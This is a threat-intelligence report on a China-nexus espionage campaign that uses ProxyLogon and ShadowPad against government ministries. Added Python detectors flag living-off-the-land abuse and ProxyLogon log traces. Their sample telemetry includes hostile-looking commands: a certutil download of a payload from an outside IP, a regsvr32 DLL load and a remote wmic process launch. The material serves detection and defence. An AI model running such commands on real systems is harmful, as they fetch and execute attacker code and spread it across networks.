ESET Research and CrowdStrike have jointly attributed a multi-country intrusion campaign targeting government ministries to the China-nexus cluster designated SHADOW-EARTH-053 — a previously undocumented threat actor assessed to be operating in alignment with Chinese intelligence collection priorities. The campaign, active since at least mid-2025, has compromised at least seven government ministry networks across Southeast and Central Asia, and one NATO member state’s foreign affairs ministry, deploying ShadowPad as the primary persistent access implant.
Campaign Overview
SHADOW-EARTH-053’s initial access methodology relies primarily on exploitation of Microsoft Exchange Server vulnerabilities in environments where on-premises Exchange deployments have not been fully patched. Researchers identified exploitation of the ProxyLogon vulnerability chain in several victim environments: CVE-2021-26855, a pre-authentication server-side request forgery, chained with CVE-2021-27065, a post-authentication arbitrary file write used to drop a web shell. This underscores that unpatched legacy Exchange servers continue to serve as viable entry points for sophisticated threat actors years after disclosure.
Once initial access is established, the cluster deploys ShadowPad, a modular, plugin-based RAT that has become the shared operational platform of choice across multiple China-linked threat actor clusters since it was first publicly documented in 2017, following its apparent leak from a Chinese contractor environment. ShadowPad supports keylogging, credential harvesting, file collection, interactive command execution, lateral movement via Windows Management Instrumentation (WMI) and PsExec-style remote service execution, and encrypted C2 communication over custom protocols.
Post-compromise activity observed across victims includes systematic collection of diplomatic communications, ministry personnel records, and internal policy documents — consistent with a strategic intelligence collection mission rather than financial motivation.
Living-Off-the-Land Persistence
A defining characteristic of SHADOW-EARTH-053’s tradecraft is extensive use of legitimate Windows administration tooling (LOTL) to blend post-exploitation activity with normal administrative traffic:
- WMI event subscriptions for persistence, identical to techniques used by several other China-nexus clusters
- Certutil.exe for downloading additional payloads, abusing its -urlcache option (and -decode for unpacking them) rather than its certificate-handling purpose
- Regsvr32.exe for loading ShadowPad DLL components, so that no stand-alone executable has to be written to disk
- Windows Management Instrumentation Command-line (WMIC) for reconnaissance and remote command execution
Because this activity is carried out with signed Microsoft binaries, it has to be caught behaviourally rather than by file signature: the ShadowPad binary itself is well detected by most modern EDR products in its standard form, which is why the cluster ships encrypted, compressed ShadowPad variants that evaded static signature detection on several of the observed implants.
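The behavioural checks implied by the list above, written out as an added example (editor's code, not tooling from ESET, CrowdStrike or the report). It assumes a simplified form of Sysmon Event ID 1 (process creation) and Event ID 20 (WMI event consumer registered) records; the events it scans are constructed for illustration, not telemetry from a victim network.

```python
"""Behavioural checks for the LOTL tradecraft listed above.

Added example (editor's, not tooling from ESET, CrowdStrike or the report).
Events are a simplified form of Sysmon Event ID 1 (process creation) and
Event ID 20 (WMI event consumer registered); SAMPLE_EVENTS below are
constructed for illustration, not records from a victim network.
"""
import re

# Directories an ordinary user or service can write to; a DLL handed to
# regsvr32 from one of these is not part of a normal software install.
USER_WRITABLE = re.compile(r"\\(users|programdata|windows\\temp)\\", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_process(image, cmdline, parent_image=""):
    """Return the LOTL techniques a process-creation event matches ([] if none)."""
    exe, cl = _basename(image), cmdline.lower()
    hits = []
    # certutil's URL-cache and decoder switches are the download/decode abuse,
    # not its certificate verification functions.
    if exe == "certutil.exe" and re.search(r"[-/](urlcache|decode|decodehex)\b", cl):
        hits.append("certutil download/decode")
    if exe == "regsvr32.exe":
        if "/i:http" in cl or "scrobj.dll" in cl:
            hits.append("regsvr32 remote scriptlet")
        elif USER_WRITABLE.search(cl):
            hits.append("regsvr32 loading DLL from user-writable path")
    if exe == "wmic.exe":
        if "process call create" in cl:
            hits.append("wmic process creation")
        if "/node:" in cl:
            hits.append("wmic remote execution")
    # Commands launched through WMI (including CommandLineEventConsumer
    # triggers) show up as children of WmiPrvSE.exe; legitimate management
    # agents do this too, so treat it as a triage signal, not a verdict.
    if _basename(parent_image) == "wmiprvse.exe":
        hits.append("process spawned by WmiPrvSE")
    return hits


def classify_wmi_consumer(consumer_type, destination):
    """Sysmon Event ID 20: script and command-line consumers are the persistence primitive."""
    t = consumer_type.lower().replace(" ", "")
    if t.startswith("commandline"):
        return ["WMI CommandLineEventConsumer -> " + destination]
    if t.startswith("activescript"):
        return ["WMI ActiveScriptEventConsumer -> " + destination]
    return []


def scan(events):
    """Run the checks over a list of event dicts; returns (index, finding) pairs."""
    findings = []
    for i, ev in enumerate(events):
        if ev["EventID"] == 1:
            hits = classify_process(ev["Image"], ev["CommandLine"], ev.get("ParentImage", ""))
        elif ev["EventID"] == 20:
            hits = classify_wmi_consumer(ev["Type"], ev["Destination"])
        else:
            hits = []
        findings.extend((i, h) for h in hits)
    return findings


SAMPLE_EVENTS = [  # constructed sample telemetry
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify cert.cer", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://203.0.113.17/up.dat C:\ProgramData\up.dat",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\ProgramData\msvcr.dll", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic /node:10.20.4.18 process call create "cmd /c whoami"',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get caption", "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c C:\ProgramData\up.dat",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"EventID": 20, "Type": "Command Line", "Destination": r"C:\ProgramData\up.dat"},
    {"EventID": 20, "Type": "NT Event Log", "Destination": "SCM Event Log Consumer"},
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding)
```

Run against the constructed events, only the benign certutil verification, the `wmic os get caption` query and the built-in NT Event Log consumer pass silently; each of the other records produces at least one finding, and the remote `wmic` call produces two. The value of keying on parent process and consumer type, rather than on the ShadowPad binary, is that the checks still fire when the implant itself is a packed variant the EDR does not recognise.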
ShadowPad’s Broader Significance
ShadowPad’s prominence across China-linked campaigns, used by at least a dozen distinct clusters attributed to different Chinese intelligence and military components, reflects a deliberate shared infrastructure strategy. Multiple threat actors using the same implant complicates attribution and creates shared operational security risks, but it also simplifies capability maintenance: a single development team’s improvements benefit all users of the platform.
The continued successful deployment of ShadowPad against government targets in 2026 indicates that neither the platform’s public disclosure nor the availability of signatures has meaningfully degraded its operational effectiveness against insufficiently hardened target environments.
Priority Environment Impact
Organisations running on-premises Microsoft Exchange Server should treat the SHADOW-EARTH-053 campaign as a signal to re-examine their Exchange security posture urgently. The continued exploitation of ProxyLogon, more than four years after its March 2021 disclosure, demonstrates that:
- Significant numbers of Exchange deployments remain unpatched against well-documented vulnerabilities
- China-nexus actors actively maintain exploitation capabilities for legacy vulnerabilities precisely because unpatched infrastructure remains available
- Exchange Server’s privileged position in enterprise environments (domain-joined, trusted by Active Directory, rich access to communications) makes it a perennially high-value target
Recommended actions:
- Run the Exchange Server Health Checker script (HealthChecker.ps1) against all on-premises Exchange servers to identify outstanding security updates
- Review Exchange server IIS logs for indicators of ProxyLogon exploitation: POST requests to /ecp/default.flt, the /OAB/ directories and /autodiscover/ paths from unexpected source IPs
- Audit Exchange CU (Cumulative Update) status: Microsoft issues security updates only for the current and immediately preceding CU, so organisations more than one CU behind the current release are running Exchange configurations Microsoft no longer actively patches
- Consider a migration timeline to Exchange Online: on-premises Exchange’s attack surface is large, and the maintenance burden of keeping it fully patched against a sophisticated and persistent threat actor is significant
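The IIS log review recommended above, as an added example (editor's code, not a tool from the report or from Microsoft). It assumes logs in the default IIS W3C format with a `#Fields` header, and `TRUSTED_NETS` stands in for the organisation's own address ranges; the watched paths are the three named above plus /owa/auth/Current/, which Microsoft's March 2021 HAFNIUM guidance also listed. The log excerpt it parses is constructed, not taken from an incident.

```python
"""Triage IIS W3C logs from an on-premises Exchange server for ProxyLogon-style POSTs.

Added example (editor's, not tooling from the report or from Microsoft).
Assumptions: default IIS W3C log format with a #Fields header; TRUSTED_NETS
is a placeholder for the organisation's own ranges; SAMPLE_LOG is constructed.
"""
import ipaddress

# Paths named in the recommended actions above, plus /owa/auth/Current/, which
# Microsoft's March 2021 HAFNIUM guidance also listed for ProxyLogon.
WATCHED_PREFIXES = ("/ecp/default.flt", "/oab/", "/autodiscover/", "/owa/auth/current/")

TRUSTED_NETS = [ipaddress.ip_network("10.20.0.0/16")]  # assumed internal range


def parse_w3c(text):
    """Turn W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()  # IIS encodes spaces inside values as '+'
            if len(values) == len(fields):
                records.append(dict(zip(fields, values)))
    return records


def is_trusted(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def find_proxylogon_posts(records):
    """Flag POSTs to the watched paths that succeeded (200) without authentication.

    A legitimate anonymous POST to these endpoints is answered with a 401
    challenge; the ProxyLogon SSRF stage is pre-auth and returns 200. The
    source address sets the severity: an unauthenticated success from outside
    the trusted ranges is the strongest signal, one from inside still needs
    explaining.
    """
    hits = []
    for r in records:
        path = r.get("cs-uri-stem", "").lower()
        if (r.get("cs-method") == "POST"
                and path.startswith(WATCHED_PREFIXES)
                and r.get("cs-username", "-") == "-"
                and r.get("sc-status") == "200"):
            ip = r.get("c-ip", "")
            hits.append({
                "time": f"{r.get('date')} {r.get('time')}",
                "c-ip": ip,
                "path": r.get("cs-uri-stem"),
                "severity": "high" if not is_trusted(ip) else "medium",
            })
    return hits


SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2026-01-14 03:12:07 10.20.0.5 POST /ecp/default.flt - 443 - 203.0.113.17 python-requests/2.31 200
2026-01-14 03:12:09 10.20.0.5 POST /autodiscover/autodiscover.xml - 443 CORP\\jdoe 10.20.4.18 Microsoft+Office/16.0 200
2026-01-14 03:12:10 10.20.0.5 POST /autodiscover/autodiscover.xml - 443 - 198.51.100.9 Microsoft+Office/16.0 401
2026-01-14 03:12:11 10.20.0.5 POST /owa/auth/Current/themes/resources/logon.css - 443 - 203.0.113.17 python-requests/2.31 200
2026-01-14 03:12:12 10.20.0.5 GET /owa/ - 443 CORP\\asmith 198.51.100.9 Mozilla/5.0 200
2026-01-14 03:12:15 10.20.0.5 POST /OAB/ - 443 - 10.20.4.30 python-requests/2.31 200
"""

if __name__ == "__main__":
    for hit in find_proxylogon_posts(parse_w3c(SAMPLE_LOG)):
        print(hit)
```

On the constructed excerpt the authenticated Outlook autodiscover POST and the anonymous POST that was challenged with 401 are left alone; the two external pre-auth successes are reported as high and the one from an internal address as medium. Path matching alone would drown the analyst in legitimate autodiscover traffic, which is why the check also requires the empty username and the 200 status that the SSRF stage produces.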